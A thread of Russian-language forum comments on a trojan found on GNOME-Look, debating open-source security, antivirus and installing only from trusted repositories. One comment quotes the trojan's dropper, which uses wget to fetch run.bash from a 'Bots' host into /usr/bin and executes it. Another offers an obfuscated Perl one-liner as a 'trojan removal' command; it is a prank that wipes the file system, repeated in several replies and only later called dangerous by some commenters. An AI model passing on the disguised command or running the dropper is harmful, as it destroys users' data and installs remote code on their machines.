Comments 129
Вчера тоже наткнулся на эту новость. Ну чтож товарищи с почином,
вот и начала проявляться обратная сторона популярности linux.
P.S. Уверен что сообщество сможет противостоять подобного рода
угрозам, по крайне мере существующие сейчас механизмы на это способны,
сложнее будет когда появятся большее число программ.
вот и начала проявляться обратная сторона популярности linux.
P.S. Уверен что сообщество сможет противостоять подобного рода
угрозам, по крайне мере существующие сейчас механизмы на это способны,
сложнее будет когда появятся большее число программ.
Куда уж больше программ? их и так многие тысячи.
Троян — не совсем вирус(даже скорее совсем не вирус) он безпользователя размножаться не сможет.
А перед пользователем беззащитны вообще все.
IMHO: Антивирусы были обруганы за дело
А перед пользователем беззащитны вообще все.
IMHO: Антивирусы были обруганы за дело
Скорее, имелись в виду, политики, а не программы.
Например, основная политика: устанавливать программы (включая темы, скринсейверы и прочее) только через проверенный репозиторий.
Доверять же архиву с непонятным содержимым не стоит, даже если он выложен на сайте автора.
Например, основная политика: устанавливать программы (включая темы, скринсейверы и прочее) только через проверенный репозиторий.
Доверять же архиву с непонятным содержимым не стоит, даже если он выложен на сайте автора.
Качать и ставить софт только из подписанных репозиториев, желательно официальных. Используйте этот механизм и ваши волосы будут кучерявыми.
Ну так это файлопомойка по сути, туда вообще можно rm -rf / выложить. Качать оттуда бинарники — это самоубийство какое-то.
Рано бить в набат, а вернее уже поздно, эти ваши «трояны» уже как сто лет существуют и хостеры не по наслышке знают о них, ведя неравные бои в «абсолютно незащищенной» (резидентным антивирем) системе ;)
Кстати антивирь не панацея вовсе, если пользователь запустил от рута что-то вроде:
cd /usr/bin/
wget 05748.t35.com/Bots/index.php
wget 05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
какую из набора команд нужно запрещать?.. Похожим образом, например, устанавливается Flash ( habrahabr.ru/blogs/ubuntu/76460/ ) или Swiftfox ( getswiftfox.com/installer.htm )
Я бы даже сказал что ничего нелегального в этом способе нет вовсе, дело только в контексте — пользователь получил не то, что он хотел.
Кстати антивирь не панацея вовсе, если пользователь запустил от рута что-то вроде:
cd /usr/bin/
wget 05748.t35.com/Bots/index.php
wget 05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
какую из набора команд нужно запрещать?.. Похожим образом, например, устанавливается Flash ( habrahabr.ru/blogs/ubuntu/76460/ ) или Swiftfox ( getswiftfox.com/installer.htm )
Я бы даже сказал что ничего нелегального в этом способе нет вовсе, дело только в контексте — пользователь получил не то, что он хотел.
Благо исходные коды открыты, а тот кто действительно заинтересован в безопасности, будет просто уделять больше внимания источникам и хотя бы бегло просматривать код. Другой вопрос сколько таких вредных функций в закрытых программах, без исходных кодов, о которых можно только догадываться, тут уж никак не проверишь.
например я не использую не одну закрытую программу, думаю мало кто из линуксоидов делает иначе
нет, я не изучаю исходники.
Но открытость исходников дает преимущество, ведь есть такие кто изучают сорсы
Но открытость исходников дает преимущество, ведь есть такие кто изучают сорсы
Не хотелось бы цепляться к словам, но вряд-ли у Вас софт ТОЛЬКО от этих компаний.
Да и наличие незакрытых годами уязвимостей — гораздо опаснее.
Да и наличие незакрытых годами уязвимостей — гораздо опаснее.
почему не дает?
Продукты MS закрытые, мы не знаем что там можем только предпологать.
Тот же Eclipse открытый, уверен есть люди которые изучают его код, в случаенаходения вот таких вот вредоносных строчек будут исправлять, писать об этом, то есть мы бкдем знать об этом
Продукты MS закрытые, мы не знаем что там можем только предпологать.
Тот же Eclipse открытый, уверен есть люди которые изучают его код, в случаенаходения вот таких вот вредоносных строчек будут исправлять, писать об этом, то есть мы бкдем знать об этом
то что были найдены вредоносные действия в каталоге GNOME-Look, о том и говорит что открытые исходники изучаются
ну все таки находят.а закрытых проектах так и не найдут, пока не будет использовано 1000 уязвимостей
Mrcid хочет сказать, что при прочих равных условиях шанс, что кто-то обнаружит «вредоносность» OpenSource гораздо выше.
Хотя я сам всегда думаю — неужели кто-то проверяет весь код?
Хотя я сам всегда думаю — неужели кто-то проверяет весь код?
Да, интересно, и кто это обнаружит? Mrcid? :D
Я вас много знакомых, ведущих аудит кода? Не думаю, что найдется хотя бы один. Всесторонний анализ кода это достаточно сложный и трудоемкий процесс. Поэтому делает это автор ПО да еще может пару человек которых к этому обязывает служебное положение.
aktuba абсолютно прав. В OpenSource большой плюс в том, что я могу взять исходники программы и в случае надобности изменить их/дописать свое расширение. Но по ходу понимают это только те, кто такие модификации проводил ;)
Я вас много знакомых, ведущих аудит кода? Не думаю, что найдется хотя бы один. Всесторонний анализ кода это достаточно сложный и трудоемкий процесс. Поэтому делает это автор ПО да еще может пару человек которых к этому обязывает служебное положение.
aktuba абсолютно прав. В OpenSource большой плюс в том, что я могу взять исходники программы и в случае надобности изменить их/дописать свое расширение. Но по ходу понимают это только те, кто такие модификации проводил ;)
Простите, но по-моему у вас с aktuba какая-то извращенная логика.
Не нужно миллионов глаз для аудита абсолютно всех исходников абсолютно всех открытых проектов, которые существуют.
Угроза от вируса в открытом проекте пропорциональна количеству пользователей этого проекта.
А количеству пользователей пропорционально внимание программистов к исходникам.
Согласитесь, вероятность выживания вредоносного кода в продуктах типа Apache HTTP Server уж никак не выше, чем в закрытых проектах аналогичного масштаба.
А то нашли бекдор в программе с одним автором и тремя с половиной пользователями подняли шумиху…
Не нужно миллионов глаз для аудита абсолютно всех исходников абсолютно всех открытых проектов, которые существуют.
Угроза от вируса в открытом проекте пропорциональна количеству пользователей этого проекта.
А количеству пользователей пропорционально внимание программистов к исходникам.
Согласитесь, вероятность выживания вредоносного кода в продуктах типа Apache HTTP Server уж никак не выше, чем в закрытых проектах аналогичного масштаба.
А то нашли бекдор в программе с одним автором и тремя с половиной пользователями подняли шумиху…
Я думаю, что аудит кода- это преррогатива мейнтейнеров дистрибутива, равно как и допиливание софта, который в него входит. Автору то зачем его проводить? Он его сто раз видел, пока писал и отлаживал :) Хотя было бы очень круто, если бы существовало сообщество, занимающееся исключительно проверкой кода на отсутствие закладок, уязвимостей и т.д. и т.п. Только вот вряд-ли оно будет- работа нудная и кропотливая, а необходимые специалисты слишком высокооплачиваемы.
поверьте читают исходники.
Разработчикам descent пришлось для написания свого плагина в том числе и изучать код eclipse. Мне пришлось для написания патча изучать исходники одного свободного проекта. не пытайтесь утверждать, то исходники не читает *никто*. Это не так.
Да-да, я надеюсь что кто-нибудь голосует на выборах, разобравшись в программах кандидатов. Перестраиваясь вправо не глядя в зеркало, я надеюсь что кто-нибудь сзади в этот момент напряженно смотрит на дорогу. Покупая молоко в магазине, я надеюсь что кто-нибудь до меня посмотрел на срок годности — ведь в магазине тысячи покупателей, кто-то же смотрит на эти маленькие черные цифры. В общем, я всегда надеюсь на то, что есть кто-то другой, кто позаботится о моей безопасности.
ну не даёт вам — ну не используйте.
мне даёт и из двух одинаковых продуктов я выберу открытое решение. Только если закрытое намного не выше по функционалу.
а так — после нескольких лет на линуксе и очень многим разборкам с виндой у друзей — имхо, открытый софт если пишется адекватными людьми (а таковые стоят у истоков почти всех крупных проектов сейчас), то он _стабильнее_ чем закрытые аналоги. Закрытый софт работает до поры до времени, пока что то не «упс». Потом его юзер выключает и включает и работает дальше. А при таком «упсе» у открытого софта очень скоро будет армия подписавшихся под багрепортом.
У того же MS Office — я даже не представляю куда отправлять багрепорт и что там сказать на вопрос «какой софт установлен?». Скажу — ну антивирус АБВГД. А мне — ну так это проблема антивирусаа…
мне даёт и из двух одинаковых продуктов я выберу открытое решение. Только если закрытое намного не выше по функционалу.
а так — после нескольких лет на линуксе и очень многим разборкам с виндой у друзей — имхо, открытый софт если пишется адекватными людьми (а таковые стоят у истоков почти всех крупных проектов сейчас), то он _стабильнее_ чем закрытые аналоги. Закрытый софт работает до поры до времени, пока что то не «упс». Потом его юзер выключает и включает и работает дальше. А при таком «упсе» у открытого софта очень скоро будет армия подписавшихся под багрепортом.
У того же MS Office — я даже не представляю куда отправлять багрепорт и что там сказать на вопрос «какой софт установлен?». Скажу — ну антивирус АБВГД. А мне — ну так это проблема антивирусаа…
> Видимо и не пытались? =) В меню специальный пункт есть — «Напишите нам» =)))
> И я уверен, что отреагируют гораздо быстрее, чем разработчики СПО-софта. Был опыт обращения к
> последним.
я очень много общаюсь с разработчиками «СПО-софта» (это что за термин такой вообще?) и вообще сам им являюсь. И никто, вообще никто, ни разу из моих друзей и знакомых не пытался отправить багрепорт ни в одну закрытую программу вообще. Даже люди вроде бы как «подкованные». При любых глюках наезды идут либо на ось, либо на «антивирус» (популярно нынче) либо на ещё кого-нибудь. А учитывая что перезагрузки оси ошибка _действительно_ может пройти, это вообще выходит из-под контроля. Я уж молчу о том, что если платить деньги за весь софт, то это у любого продвинутого пользователя встанет в несколько тысяч долларов ежегодно. А учитывая что даже директора крупных компаний вообще не брезгуют ставить пиратский софт — вот сколько угодно мне говорите, мол, «я всё покупаю» — ну нереально в такое поверить в России.
и если и не знаю секрет ли для вас, но для нас нет — как бы там ни было более половины багрепортов в открытый софт решаются самим коммьюнити, часто — самим репортером. С закрытым софтом такое впринципе невозможно.
на следующее ваше сообщение отвечать не буду (а потому не утруждайте себя отвечать и на моё). Ибо холиварить глупо =). Ещё один человек рассуждающий, а не выкладывающий факты. Одна только фраза «СПО-софт» уже сказала о вас как о человеке вообще слабо представляющем натуральные плюсы и минусы софта с открытым кодом (причём, не всегда при этом бесплатного) =)
> И я уверен, что отреагируют гораздо быстрее, чем разработчики СПО-софта. Был опыт обращения к
> последним.
я очень много общаюсь с разработчиками «СПО-софта» (это что за термин такой вообще?) и вообще сам им являюсь. И никто, вообще никто, ни разу из моих друзей и знакомых не пытался отправить багрепорт ни в одну закрытую программу вообще. Даже люди вроде бы как «подкованные». При любых глюках наезды идут либо на ось, либо на «антивирус» (популярно нынче) либо на ещё кого-нибудь. А учитывая что перезагрузки оси ошибка _действительно_ может пройти, это вообще выходит из-под контроля. Я уж молчу о том, что если платить деньги за весь софт, то это у любого продвинутого пользователя встанет в несколько тысяч долларов ежегодно. А учитывая что даже директора крупных компаний вообще не брезгуют ставить пиратский софт — вот сколько угодно мне говорите, мол, «я всё покупаю» — ну нереально в такое поверить в России.
и если и не знаю секрет ли для вас, но для нас нет — как бы там ни было более половины багрепортов в открытый софт решаются самим коммьюнити, часто — самим репортером. С закрытым софтом такое впринципе невозможно.
на следующее ваше сообщение отвечать не буду (а потому не утруждайте себя отвечать и на моё). Ибо холиварить глупо =). Ещё один человек рассуждающий, а не выкладывающий факты. Одна только фраза «СПО-софт» уже сказала о вас как о человеке вообще слабо представляющем натуральные плюсы и минусы софта с открытым кодом (причём, не всегда при этом бесплатного) =)
блаженны верующие
О да, а как надеялись пользователи купленной ms windows в локалке, что их conficker жрать не будет, у-у-у… …пожалуй даже больше, чем пользователи опять же купленной MacOS сохранить свой домашний каталог в целости при обновлении.
> Под покупным софтом, разумеется, я подразумеваю софт от крупных компаний, таких как MS, Oracle, Adobe и т.д.
Какое отвратительное лицемерие. Устанавливая софт через synaptics я тоже уверен, что он не содержит встроенной гадости. Что это доказывает? Зачем вообще использовать подмену понятий в спорах с другими людьми?
Отрубание рук топором безопасно. Под отрубанием рук топором, разумеется, я подразумеваю поход в зоопарк.
Какое отвратительное лицемерие. Устанавливая софт через synaptics я тоже уверен, что он не содержит встроенной гадости. Что это доказывает? Зачем вообще использовать подмену понятий в спорах с другими людьми?
Отрубание рук топором безопасно. Под отрубанием рук топором, разумеется, я подразумеваю поход в зоопарк.
>нет, я не изучаю исходники.
Но открытость исходников дает преимущество, ведь есть такие кто изучают сорсы
Ну вот смотрите, лежат на сайте 2 пакета: .tar.gz и .deb. Этот самый «кто нибудь», который любит почитать перед сном исходники программ, исследует tar.gz и ничего не находит. Вы ставите себе deb и ловите трояна. Ибо то, что deb лежит рядом с tar.gz и имеет то же имя, ещё не говорит о том, что он был скомпилён из этих исходников. Никто не мешает автору засунуть вредоносный код непосредственно перед сборкой deb-а.
Если собираете руками — тогда да, ещё есть смысл в изучении исходников, иначе — болт.
Но открытость исходников дает преимущество, ведь есть такие кто изучают сорсы
Ну вот смотрите, лежат на сайте 2 пакета: .tar.gz и .deb. Этот самый «кто нибудь», который любит почитать перед сном исходники программ, исследует tar.gz и ничего не находит. Вы ставите себе deb и ловите трояна. Ибо то, что deb лежит рядом с tar.gz и имеет то же имя, ещё не говорит о том, что он был скомпилён из этих исходников. Никто не мешает автору засунуть вредоносный код непосредственно перед сборкой deb-а.
Если собираете руками — тогда да, ещё есть смысл в изучении исходников, иначе — болт.
Тут как в анекдоте про евреев только наоборот, когда они учились пить водку и один подумал что если он принесет воду, а не водку никто не заметит. В итоге оказался полный чан воды. Каждый кто юзает опенсорс софт думает что там все чистенько и супер потому что хоть мне и некогда но наверняка сотни людей посмотрят что же там. Остается загадкой сколько из этих сотен думают так же и посмотрит ли кто-нить вообще этот код в принципе.
Спрос рождает предложение.
Я более чем уверен, что если трояны в линуксе станут серьезной проблемой, это станет стимулом и рекламой для хорошо зарекомендовавших себя сборщиков дистрибутивов. Или людей, которые их обозревают, эдаких аудиторов.
А вообще, как уже было сказано выше — берите из проверенного источника и не морочьте себе голову.
Я более чем уверен, что если трояны в линуксе станут серьезной проблемой, это станет стимулом и рекламой для хорошо зарекомендовавших себя сборщиков дистрибутивов. Или людей, которые их обозревают, эдаких аудиторов.
А вообще, как уже было сказано выше — берите из проверенного источника и не морочьте себе голову.
Mecid, а из какого каталога запускать удаление? А то в параметрах указаны файлы с относительными путями.
Мое ИМХО — это говорит не о том опасно на Linux или Windows нет, это говорит о том, что Linux стал популярным, что троянщики стали уделять время на написания вредоносного ПО на Linux.
Легко, лежит, бинарником незапущенным на винте и не шевелится!
Кто может с уверенностью сказать что он сейчас делает на вашем компьютере?ничего. ибо не запущен
… но установлен....;)
Я устанавливаю skype только когда кто-нибудь просит поговорить по нему и потом немедленно сношу.
Меня ещё можно вылечить? :)
Меня ещё можно вылечить? :)
если только пересадить на счёты с костяшками))))
шучу, никаких претензий)))
шучу, никаких претензий)))
Говорят, еще надо windows переставлять после де-инсталяции. А то мало ли…
А что с ним не так? Судя по новостям, дело было в серверах.
интересно, а как в настоящее время проверяют наличие/отсутствие вредоносного кода сборщики дистрибутивов? ведь много пакетов поддерживается сообществом…
Любая ОС уязвима к троянам. Точка. Если уж пользователь настолько доверчив, что запускает недоверенный софт от рута — что ж, флаг в руки, тут никакой линукс не спасёт.
Наблюдение из жизни простое — если руки прямые, всё хорошо в любой ОС (у меня вирусов на моём компе, пока я ещё на винде сидел, не было многие годы, без антивируса). А если руки кривые — проблемы будут везде, как бы не старались разработчики.
Наблюдение из жизни простое — если руки прямые, всё хорошо в любой ОС (у меня вирусов на моём компе, пока я ещё на винде сидел, не было многие годы, без антивируса). А если руки кривые — проблемы будут везде, как бы не старались разработчики.
>А у Windows огромный опыт.
Уверен что даже это не поможет от аналогичного батника (а уж повершелл — сказка). Причем не заметит ни один из имеющихся антивирусов, так как по сути в нем нет ничего необычного.
Уверен что даже это не поможет от аналогичного батника (а уж повершелл — сказка). Причем не заметит ни один из имеющихся антивирусов, так как по сути в нем нет ничего необычного.
>Ну, давайте не сравнивать .bat-файл и пакет установки.
Что в винде отменили инсталляторы, хахаха. Да там обычно даже и не посмотришь без такой то матери, что тебе инсталлятор делает в системе и спросит он у тебя администраторские права ведь дашь. Ну не ты, так другие 9 из 10.
>Плюс, если батник требует вмешательства в систему, то в Windows Vista/7 его нужно запускать с правами администратора
Ты вообще смотрел, что там на гномолуке было? Не надо там никаких администраторских прав и точно также и в винде. Учитывая количество софта распространяющегося под винду впарить подобный скрипт проще простого и будешь как миленький ддосить, что тебе скажут.
Что в винде отменили инсталляторы, хахаха. Да там обычно даже и не посмотришь без такой то матери, что тебе инсталлятор делает в системе и спросит он у тебя администраторские права ведь дашь. Ну не ты, так другие 9 из 10.
>Плюс, если батник требует вмешательства в систему, то в Windows Vista/7 его нужно запускать с правами администратора
Ты вообще смотрел, что там на гномолуке было? Не надо там никаких администраторских прав и точно также и в винде. Учитывая количество софта распространяющегося под винду впарить подобный скрипт проще простого и будешь как миленький ддосить, что тебе скажут.
>Я повторюсь — речь идет о излишнем изначальном доверии пользователей и мейнтейнеров
Да нет там никаких ментейнеров на этом гномолуке, весь контент юзерский и модерируется вот в таких вот случаях, ну или если какой олух «хуй» напишет в названии. А в современных популярных дистрибутивах ментейнеры люди исключительно доверенные. Если вы не доверяете им, то вам также не стоит доверять тому, кто подготавливает файлы для windows update, ведь почему бы ради того чтобы поиметь ботнет в 90% всех компов не втереться в доверие к M$? :)
>Если Вы уверены, что в Windows из коробки есть инструменты для запуска аналогичных по функциональности .bash-скриптам скриптов, то глубоко ошибаетесь.
Уж скачать файл через telnet и запустить ping точно осилит. А powershell еще и не такое умеет, он же вроде теперь по умолчанию?
Да нет там никаких ментейнеров на этом гномолуке, весь контент юзерский и модерируется вот в таких вот случаях, ну или если какой олух «хуй» напишет в названии. А в современных популярных дистрибутивах ментейнеры люди исключительно доверенные. Если вы не доверяете им, то вам также не стоит доверять тому, кто подготавливает файлы для windows update, ведь почему бы ради того чтобы поиметь ботнет в 90% всех компов не втереться в доверие к M$? :)
>Если Вы уверены, что в Windows из коробки есть инструменты для запуска аналогичных по функциональности .bash-скриптам скриптов, то глубоко ошибаетесь.
Уж скачать файл через telnet и запустить ping точно осилит. А powershell еще и не такое умеет, он же вроде теперь по умолчанию?
Вообще-то bash для скриптинга — весьма неудобная штука. В винде по умолчанию есть Jscript/VBscript — можно делать аналогичные, но более понятные скрипты.
Уже приведенный здесь PowerShell хоть и является весьма гибким средством, но все же не может быть использован для подобного рода атак из-за дефолтных настроек безопасности для скриптов (попробуйте скачать ps1 файл и запустить его)
help about_Execution_Policies
Дефолтная политика: Restricted, позволяющая выполнять команды, но не позволяющая выполнять скрипты.
Уже приведенный здесь PowerShell хоть и является весьма гибким средством, но все же не может быть использован для подобного рода атак из-за дефолтных настроек безопасности для скриптов (попробуйте скачать ps1 файл и запустить его)
help about_Execution_Policies
Дефолтная политика: Restricted, позволяющая выполнять команды, но не позволяющая выполнять скрипты.
>>При грамотном использовании Windows абсолютно безопасна.
Такие же глупости как то, что Linux абсолютно безопасна. Моего хорошего друга, грамотного виндового сисадмина, сидящего за корпоративным файрволлом, секьюрити-хуюрити, очень уверенно пробили в существующую на тот момент уязвимость в firefox, с помощью которой (при живом касперском с актуальными базами) он сразу подхватил еще тогда неизвестную модификацию Pinch, которая в течение 10 минут спиздила 300 баксов с e-gold.
Он конечно нашел потом вирь (с помощью новой беты Каспера, кроме нее никто вообще не различал его) и отправил его в Лабораторию, и через 2 часа он уже был в базах, но что толку. 300 баксов уже улетели.
Так что не надо быть самоуверенными, господа.
Такие же глупости как то, что Linux абсолютно безопасна. Моего хорошего друга, грамотного виндового сисадмина, сидящего за корпоративным файрволлом, секьюрити-хуюрити, очень уверенно пробили в существующую на тот момент уязвимость в firefox, с помощью которой (при живом касперском с актуальными базами) он сразу подхватил еще тогда неизвестную модификацию Pinch, которая в течение 10 минут спиздила 300 баксов с e-gold.
Он конечно нашел потом вирь (с помощью новой беты Каспера, кроме нее никто вообще не различал его) и отправил его в Лабораторию, и через 2 часа он уже был в базах, но что толку. 300 баксов уже улетели.
Так что не надо быть самоуверенными, господа.
Нет, тут история про дырявый СОФТ. Ни Chrome ни все равно что еще — не идеальны. Абсолютно безопасна только отключенная от интернета система, в которую не втыкают внешних носителей.
FYI: Firefox тоже не исполнил Pinch из под админских прав. Их и не надо было чтобы провести операции над кукисами в запущенном браузере.
FYI: Firefox тоже не исполнил Pinch из под админских прав. Их и не надо было чтобы провести операции над кукисами в запущенном браузере.
Согласен, но лично знаю несколько человек, у которых после установки Gentoo *внезапно* выпрямились руки. Один из них вернулся на Висту и руки у него опять стали кривыми.
Достаточная для появления троянов кривизна рук под виндой немного меньше.
Достаточная для появления троянов кривизна рук под виндой немного меньше.
Нонсенс — установить Gentoo с каким-либо осязаемым радиусом кривизны рук.
У меня перед полной чисткой HDD и установкой Gentoo было две ОС — WinXP и Ubuntu. На первой — сотня вирусов, вторая — сломана. :) Так что вы не правы.
Хотя можно предположить, что сам факт скачивания Gentoo Minimal Install CD немедленно выпрямляет руки. :D
Хотя можно предположить, что сам факт скачивания Gentoo Minimal Install CD немедленно выпрямляет руки. :D
Да, кстати, сейчас у меня тоже стоит WinXP, но ни вирусов ни антивирусов на ней нет.
а про отсутствие вирусов тогда откуда такая уверенность?
Уверенности нет, но всё работает и лишних процессов не видно.
железная логика!))))
у меня СПИДа нет — я же живу и нос не отваливается)))))
Вирусы могут быть:
1. Произведением шутников. Такие бы дали о себе знать.
2. Разрушительными. Аналогично.
3. Троянами для сбора информации. Боюсь, WinXP у меня только для игрушек и информацию там особо не соберёшь. Раздел с Gentoo даже для чтения не доступен. Ибо ext4.
Если они всё-таки есть, то это только подтверждает мой заминусованный тезис:
> Достаточная для появления троянов кривизна рук под виндой немного меньше.
1. Произведением шутников. Такие бы дали о себе знать.
2. Разрушительными. Аналогично.
3. Троянами для сбора информации. Боюсь, WinXP у меня только для игрушек и информацию там особо не соберёшь. Раздел с Gentoo даже для чтения не доступен. Ибо ext4.
Если они всё-таки есть, то это только подтверждает мой заминусованный тезис:
> Достаточная для появления троянов кривизна рук под виндой немного меньше.
Что сложного в этом? Сидишь, читаешь, делаешь. Если есть какой-либо опыт, пусть даже не большой, работы с линуксами, то генту поставить будет не сложно. Только долго. У меня потом глаза болели от этого…
Такой доверчивости неопытных пользователей очень способствуют заявления типа «windows — решето, а вот в linux вирусов не бывает, все пользователи linux желают вам добра».
man
И таких все больше и больше.
Работаю в тпх. Недавно звонил клиент поставивший меня в секундный ступор. В ходе непродолжительно беседы стало понятно, что на клиенте проблемы с DNS кэше провайдера. Остается в этом точно убедиться, а главное доказать.
-Отлично, теперь отредактируем файл hosts. Открываем диск С, папка Windows.
-У меня Linux.
У меня ступор с мылью «ммляяять… человек слыхом не слыхивал о резолвинге имени, и он сидить под линухом?!». Но нужно уже начинать привыкать, с каждым годом леммингов на данной оси станет все больше.
Работаю в тпх. Недавно звонил клиент поставивший меня в секундный ступор. В ходе непродолжительно беседы стало понятно, что на клиенте проблемы с DNS кэше провайдера. Остается в этом точно убедиться, а главное доказать.
-Отлично, теперь отредактируем файл hosts. Открываем диск С, папка Windows.
-У меня Linux.
У меня ступор с мылью «ммляяять… человек слыхом не слыхивал о резолвинге имени, и он сидить под линухом?!». Но нужно уже начинать привыкать, с каждым годом леммингов на данной оси станет все больше.
alekciy, это я минусанул
сам под линуксом с 98го, работал у крупнейшего провайдера региона в нише Linux-серверов, сейчас своя фирма по интеграции Open Source и свой портал по Open Source с 2000 посетителей в сутки, но я в корне не согласен:
>>человек слыхом не слыхивал о резолвинге имени, и он сидить под линухом?!
возьмём эникейщика который мелкие фирмы обслуживает. Он больше меня знает в 10000 раз 1С, эксель (видимо из-за скудости моего ума для меня одна из самых страшных программ:), он знает миллион программ под Windows и тд… про ДНС он знает то, что DNS «должен быть — без него интернет не работает». Максимум он знает пинг, трейс. Но даже активные линуксойды моего сайта не знают что такое NSLOOKUP, WHOIS, не знают чем различаются TCP от IP, про семиуровневую модель OSI говорить нечего! но это ярые линуксойды, программеры и даже есть реальные учёные (не просто преподы). Мне самому временами дико, что этим людям абсолютно неизвестно как работает почтовый сервер, что такое SMTP и POP3. IMAP и тд. Но потом понимаешь, что они абсолютно не обязаны понимать как работает SMTP-сервер. И тому же виндовому эникейщику не совсем не обязательно знать, что у DNS провайдера существует кэш. А ты про обычного смертного говоришь…
P.S.: кстати этот клиент «линуксойд» может быть обычным сотрудником, которому на рабочую машину поставили Ubuntu и что он смог — это понять, что виндовза нет и у него некий линукс, о чем надо сразу предупреждать.
сам под линуксом с 98го, работал у крупнейшего провайдера региона в нише Linux-серверов, сейчас своя фирма по интеграции Open Source и свой портал по Open Source с 2000 посетителей в сутки, но я в корне не согласен:
>>человек слыхом не слыхивал о резолвинге имени, и он сидить под линухом?!
возьмём эникейщика который мелкие фирмы обслуживает. Он больше меня знает в 10000 раз 1С, эксель (видимо из-за скудости моего ума для меня одна из самых страшных программ:), он знает миллион программ под Windows и тд… про ДНС он знает то, что DNS «должен быть — без него интернет не работает». Максимум он знает пинг, трейс. Но даже активные линуксойды моего сайта не знают что такое NSLOOKUP, WHOIS, не знают чем различаются TCP от IP, про семиуровневую модель OSI говорить нечего! но это ярые линуксойды, программеры и даже есть реальные учёные (не просто преподы). Мне самому временами дико, что этим людям абсолютно неизвестно как работает почтовый сервер, что такое SMTP и POP3. IMAP и тд. Но потом понимаешь, что они абсолютно не обязаны понимать как работает SMTP-сервер. И тому же виндовому эникейщику не совсем не обязательно знать, что у DNS провайдера существует кэш. А ты про обычного смертного говоришь…
P.S.: кстати этот клиент «линуксойд» может быть обычным сотрудником, которому на рабочую машину поставили Ubuntu и что он смог — это понять, что виндовза нет и у него некий линукс, о чем надо сразу предупреждать.
Правильно. Каждый должен знать в рамках сферы своей компетенции. Но, имхо, если человек занимается администрированием/обслуживаем сайта, такие вещи он знать просто обязан.
Ведь мы ждем того, что машинист должен уметь водить локомотив, летчик управлять самолетом, а водитель автомобилем? Я не говорю о том, что бы они все знали устройство управляемого ими агрегата, я говорю о знаниях касающихся именно процесса управления.
Ведь мы ждем того, что машинист должен уметь водить локомотив, летчик управлять самолетом, а водитель автомобилем? Я не говорю о том, что бы они все знали устройство управляемого ими агрегата, я говорю о знаниях касающихся именно процесса управления.
В самом страшном случае можно clamAV приспособить для проверки скачанных из непроверенных источников пакетов.
Кстати, численно пользователей Линукса очень даже не мало, для ботнета более, чем достаточно.
Кстати, численно пользователей Линукса очень даже не мало, для ботнета более, чем достаточно.
Отследить бы автора :)
Мда.
Во-первых, при чём тут «linux стал небезопасным»? rm -rf / от рута как работал 10 лет назад, так и работает. Ничего не изменилось.
Во-вторых, а почему никто на этом ресурсе не сказал: ««gnome-look.org» раздолбаи», а сразу пошли в атаку на linux?
В-третьих, а сколько человек реально скачали этот код, до того как он был выявлен? Может быть не так много и сообщество сработало чётко, да и гномлукорговцы показали себя совсем не раздолбаями?
В-четвёртых: кто и каким образом выявил этот самый вредоносный код «в системе без традиций и средств защиты», да ещё в условиях «когда все надеются на других»?
В-пятых: при чём тут рост популярности linux? Почему уверены, что писал не фанат nix-ов? Спамеры вон kmail освоили и полюбили. Но кто это: спамер ставший никсоидом или никсоид, ставший спамером — я не знаю, хоть и подозреваю первое из-за использования явно гуёвой проги для нетребующего гуя дела.
Во-первых, при чём тут «linux стал небезопасным»? rm -rf / от рута как работал 10 лет назад, так и работает. Ничего не изменилось.
Во-вторых, а почему никто на этом ресурсе не сказал: ««gnome-look.org» раздолбаи», а сразу пошли в атаку на linux?
В-третьих, а сколько человек реально скачали этот код, до того как он был выявлен? Может быть не так много и сообщество сработало чётко, да и гномлукорговцы показали себя совсем не раздолбаями?
В-четвёртых: кто и каким образом выявил этот самый вредоносный код «в системе без традиций и средств защиты», да ещё в условиях «когда все надеются на других»?
В-пятых: при чём тут рост популярности linux? Почему уверены, что писал не фанат nix-ов? Спамеры вон kmail освоили и полюбили. Но кто это: спамер ставший никсоидом или никсоид, ставший спамером — я не знаю, хоть и подозреваю первое из-за использования явно гуёвой проги для нетребующего гуя дела.
Что панику-то разводить? Новость преподносится так, как будто под Линукс портировали конфикер. Кто не поленился зайти на сайт этого пресловутого gnome-look, тот понял что это файлопомойка в стиле веб 2.0. Любой дятел может там выложить все что угодно. И сколько там еще таких троянов, не знает никто.
Так что обычные пользователи линукса, пока ставят софт из респозиториев стабильных версий своих дистрибутивов могут спать спокойно.
Так что обычные пользователи линукса, пока ставят софт из респозиториев стабильных версий своих дистрибутивов могут спать спокойно.
Для удаления трояна требуется ввести команду:
cat «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
cat «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Боян.
Кто хочет поэкспериментировать — создайте себе специально для экспериментов пользователя:
Кто хочет поэкспериментировать — создайте себе специально для экспериментов пользователя:
# useradd -m test
# su test
$ cat «test... test... test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Не поможет?
Мне кажется, надо так:
И хотя программа, в принципе, может выбраться из-под chroot, будучи запущенной из-под рута (насколько мне известно), всё равно от шуток типа «rm -rf --no-preserve-root /» в коде программ это защитит :).
P.S. Да, я знаю, что perl так не запустится :).
# mkdir /tmp/bugoga
# chroot /tmp/bugoga
# echo 'test... test... test...' | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
И хотя программа, в принципе, может выбраться из-под chroot, будучи запущенной из-под рута (насколько мне известно), всё равно от шуток типа «rm -rf --no-preserve-root /» в коде программ это защитит :).
P.S. Да, я знаю, что perl так не запустится :).
у вас ошибка
не cat «test… test… test...» а
echo «test… test… test...» :)
не cat «test… test… test...» а
echo «test… test… test...» :)
ты вообще понимаешь, что подобными «шутками» вы настроили против линукса не одну тысячу человек? и это «ярые бАрцы за распространение СПО»…
Во-первых, это не шутка, троян действительно удалится (хотя там пишут, что в коде ошибка, я не знаю).
Во-вторых, я всего лишь в ироничной форме отметил тот факт, что автор топика предлагает без особых разъяснений просто выполнить некий код для удаления трояна, что тоже является потенциально опасным действием. Так-то!
Во-вторых, я всего лишь в ироничной форме отметил тот факт, что автор топика предлагает без особых разъяснений просто выполнить некий код для удаления трояна, что тоже является потенциально опасным действием. Так-то!
